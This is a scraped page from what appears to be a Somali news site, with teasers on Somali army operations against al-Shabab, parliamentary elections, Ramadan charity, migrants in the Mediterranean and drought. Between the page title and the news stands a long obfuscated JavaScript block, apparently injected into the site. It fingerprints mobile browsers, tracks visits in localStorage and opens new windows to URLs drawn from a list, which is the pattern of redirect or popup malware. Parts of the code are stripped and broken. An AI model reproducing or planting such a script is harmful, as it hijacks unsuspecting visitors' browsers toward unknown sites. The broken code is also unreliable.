Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
SNA kills militants during operation in central Somalia
MOGADISHU -- The special forces of the Somali National Army (SNA), Danab, killed seven al-Shabab militants and wounded others Sunday during a security operation at an area near Wisil town in Hobyo in Mudug region, central Somalia, a senior army official said.
Odowa Yusuf Rage, the SNA chief, said the forces also arrested two wounded militants and recovered weapons and...
Turkish charity reaches out to needy in Somalia
A Turkish charity said on Monday it has provided food packages to 427 families in Somalia as part of its activities during the Muslim holy month of Ramadan.
"We are in the capital Mogadishu. We have delivered food and greetings to the families who are in a difficult situation due to the drought," the Istanbul-based Humanitarian Relief Organization (IHH) said...
Ku dhawaad 100 muhaajiriin ah oo doon ay kula degtay badda Meditareeniyaanka
ROMA (SMN) - In ka badan 90 muhaajiriin ah ayaa dooni ay la socdeen ku dagtay badweynta Meditareeniyaanka kadib markii ay kasoo safreen dalka Liibya si u gaaraan dalalka Yurub.
Hay'adda Q.M u qaabilsan socdaalka ee IOM ayaa sheegtay in sadexdii bilood ee ugu dambeysay ay badweyntaasi ku geeriyoodeen 300 oo qof oo muhaajiriin ah.
Maalmihii u dambeeyey waxaa sii kordhayay...
Magacyada xildhibaannada maanta qaatay shahaadada + Sawirro
MUQDISHO (SMN) -Waxaa Maalintii Saddexaad ka socda xarunta dhexe ee guddiga doorashooyinka heer Federaal ka socda shahaado siinta Xildhibaanada cusub ee Baarlamaanka 11-aad.Guddiga doorashooyinka Heer Federaal ee FIET waxay Magaalada Muqdisho ka wadaan Shahaado siinta iyo kaararka Aqoonsiga Xildhibaannada labada Aqal ee Golaha Shacabka.
Guddiga oo Shaqadaan bilaabay labadii Bishaan ayaa waxaa ay Shahaadada Xildhibaannimo iyo kaararka aqoonsiga Guddoonsiiyeen inku...
Ciidamo ka tirsan AMISOM oo qarax lagula eegtay duleedka Muqdisho
MUQDISHO (SMN) - Faah faahino dheeraad ah ayaa waxaa laga helayaa khasaaraha ka dhashay qarax ciidamo ka tirsan kuwa AMISOM maanta lagula eegtay inta u dhexeysa deegaanada Lafoole iyo Xaawo Cabdi ee duleedka Muqdisho.
Qaraxa oo miinada nooca dhulka la dhigo ayaa la sheegay inuu qabsaday mid ka mid ah gawaaridii ay saarnayeen ciidamada AMISOM, waxaana qaraxa jugtiisa ay aheyd...
Axmed Karaash oo kulan la yeeshay wafdi ka socda UNSOM + Sawirro
GAROOWE (SMN) -Ku simaha Madaxweynaha Ahna Madaxweyne ku xigeenka Puntland Mudane Axmed Cilmi Cismaan (Karaash) ayaa maanta Qasriga Madaxtooyada ku qaabilay Madaxa Kooxda Ilaalinta Xuquuqul Iinsaanka UNSOM ee Soomaaliya Mrs Kirsten Young Ahna Wakiilka Xafiiska Qaramada Midoobay ee Xuquuqda Aadanaha (OHCHR) iyo wefti ay hogaaminayo.
Kulanka ayaa looga hadlay xaalada xuquuqul Aadanaha ee Puntland, Hir-gelinta Xeerka Caalamiga ah ee dhowrista...
Doorashada kursi ka mid ah Golaha Shacabka oo ka dhaceysa Beledweyne
BELEDWEYNE (SMN) - Guddiga doorashada ee HirShabelle ayaa shaaciyey in maanta la qabanayo doorashada kursiga tirsigiisu yahay HOP#039 oo ay deegaan doorashadiisu tahay Beledweyne.
Musharixiinta u tartamaya kursigan ayaa la filayaa in la diiwaangeliyo gelinka hore ee maanta, iyada oo isla gelinka dambe ee maanta doorashada la qabanayo.
Guddiga xulista ergada oo ka kooban odayaasha dhaqanka iyo bulshada rayidka ayaa dhankooda...
USAID oo ka walaacsan inuu xilligan yaraado roobka Soomaaliya
MUQDISHO (SMN) - Sarkaal sare oo u hadlay hay’adda Maraykanka u qaabilsan mucaawimada dibedda ee USAID ayaa sheegay inay ka walaacsan yihiin in markii afaraad xilli roobaadkan roobka da’aya uu ka yaraado roobkii la filayey taasi oo uu sheegay inaan horey loo arag.
Thomas Solomon oo ah madaxa xafiiska arrimaha bani’aadannimada hay’adda USAID ee Soomaaliya ayaa waraysiga uu ku bixiyey...
Guddiga FIET oo war cusub kasoo saaray dhammeystirka doorashooyinka
MUQDISHO (SMN) - Guddiga doorashooyinka Heer Federaal ee FEIT ayaa ka warbixiyay sida ay howsha Shahaado siinta Xildhibaanada ku socoto.
Qoraal uu guddiga soo saaray ayaa u dhignaa sida tan.
Maanta Waxaa qaatay Shahaadada Xildhibaanimo ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya, Xildhibaanada hoos ku qoran, kuwaas oo isugu jira Mudanayaasha Golaha Shacabka iyo Aqalka sare, oo ka kala yimid; Hirshabeelle, Koonfur Galbeed,...













